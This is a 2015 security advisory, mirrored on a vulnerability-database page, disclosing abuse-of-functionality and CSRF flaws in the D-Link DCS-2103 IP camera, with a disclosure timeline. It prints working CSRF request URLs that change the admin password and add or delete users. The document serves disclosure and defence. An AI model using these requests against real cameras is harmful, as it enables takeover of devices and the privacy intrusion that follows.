Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:32579
HistoryOct 25, 2015 - 12:00 a.m.

AoF ana CSRF vulnerabilities in D-Link DCS-2103

2015-10-2500:00:00
vulners.com
44
JSON

Hello 3APA3A!

There are Abuse of Functionality and Cross-Site Request Forgery vulnerabilities in D-Link DCS-2103 (IP camera).

Affected products:

Vulnerable is the next model: D-Link DCS-2103, Firmware 1.20. All previous versions also must be vulnerable.

Details:

Abuse of Functionality (WASC-42):

Admin's login is persistent: admin. Which simplify BF and CSRF attacks (about Brute Force I wrote in the second advisory).

Cross-Site Request Forgery (WASC-09):

Change admin's password:

http://site/vb.htm?adduser=admin:password:0

Add user:

http://site/vb.htm?adduser=user:pass:2

Delete user:

http://site/vb.htm?deluser=user

Timeline:

2014.11.14-2014.12.13 - conversation with D-Link about previous vulnerabilities in DCS-2103.
2015.07.23 - disclosed at my site previous vulnerabilities in DCS-2103.
2015.08.23 - informed developers about new vulnerabilities in DCS-2103.
2015.08.24 - announced at my site about new vulnerabilities in DCS-2103.
2015.10.24 - disclosed at my site (http://websecurity.com.ua/7877/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

JSON